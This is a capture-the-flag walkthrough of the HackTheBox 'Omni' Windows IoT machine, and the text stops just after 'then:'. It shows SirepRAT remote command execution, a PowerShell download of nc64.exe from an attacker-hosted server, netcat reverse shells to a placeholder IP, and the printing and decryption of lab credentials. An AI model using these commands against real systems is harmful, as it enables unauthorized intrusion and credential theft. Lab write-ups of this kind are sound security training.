HackTheBox: (“Omni”) — Walkthrough

Mohamed Elmasry

5 min readJan 9, 2021

Hi People :D

Today we gonna solve “Omni” machine from HackTheBox, It’s a Windows IoT machine, let’s solve it :D

Before we start, You can find all commands here

Enumeration

— — — — — — — —

First, we start with Nmap

nmap -A 10.10.10.204

( -A to do All enumeration )

We got port 8080 that’s run Microsoft IIS httpd and port 135 that’s run RPC Service

Web Enumeration

— — — — — — — — — — —

So, let’s first visit the 8080 port

http://10.10.10.204:8080

hmmm, it requesting credentials and says “Windows Device Portal”, I searched a bit to know what Windows Device Portal is then I found the Microsoft documentation

Now let’s try to find public exploit for Windows Device Portal, The first result that came to me is SirepRAT that used to exploit Windows IoT Core

let’s download it and try to get a shell, first setup requirements with:

pip install -r requirements.txt

I test it with simple echo command :

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput — return_output — cmd “C:\Windows\System32\cmd.exe” — args “/c echo “HI” — v

( You can find How to use the tool on Github )

Exploitation

— — — — — — — —

Now we will upload nc64.exe to get a shell, you can download it from here then run python HTTP server in the directory that contains nc64.exe

python3 -m http.server 80

good, now upload nc64.exe to the machine with Powershell using this command :

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput — return_output — cmd “C:\Windows\System32\cmd.exe” — args “/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\nc64.exe -Uri http://{Your_IP}/nc64.exe" — v

let’s get a shell :D, first set a listener on any port you want ( i used 4444 port )

nc -nlvp 4444

now let’s run Netcat on the machine:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput — return_output — cmd “C:\Windows\System32\cmd.exe” — args “/c C:\\Windows\\System32\\nc64.exe {Your_IP} 4444 -e powershell.exe” — v

Nice, we got a shell, let’s try to find user.txt.

Unfortunately, I didn’t find the user.txt flag anywhere. I also tried to search in logs for any information but nothing :(

The next step is to search for any .bat file

get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force

let’s try to see r.bat content:

cat “C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat”

User Flag

— — — — — —

very good, we got app user and Admin creds

let’s back to the website and try app creds:

UserName: app
Password:mesh5143

yay, we login as a user app

After check menus on the left, I found “Run command” function under processes section

So, let’s get a shell as app user. set a listener again:

nc -nlvp 4444

and from a website run netcat:

C:\Windows\System32\nc64.exe {Your_Ip} 4444 -e powershell.exe

cool! I did some enumeration again and I found “U:\” Partition, then I saw Users folder, and finally, I got users.txt at:

U:\Users\app\user.txt

unfortunately, The password is encrypted :(

I did some search about PSCredential to find a way to decrypt the password.

I found this answer in one of StackOverflow questions:

let’s try it but don’t forget to replace Dolphins.xml with user.txt XD

$credential = Import-Clixml -Path U:\Users\app\user.txt

( Note: credential is a variable, you can call it any name, not necessarily this name )

We decrypt the password all you have to do is get it, I didn't know how to get it so I searched again for a way to display it

As the docs say, To Display password, we need to use GetNetworkCredential function then Password property

The command looks like this:

$credential.GetNetworkCredential().Password

We finally get user flag :D

Root Flag

— — — — — —

You can get root flag in exactly the same way!

first, login in website with admin creds:

UserName: administrator
Password: _1nt3rn37ofTh1nGz

secondly, get a shell with the same command:

C:\Windows\System32\nc64.exe {Your_Ip} 4444 -e powershell.exe

thirdly, go to U:\Users\administrator, You’ll find root.txt then decrypt it in the same way:

$credential = Import-CliXml -Path U:\Users\administrator\root.txt

then: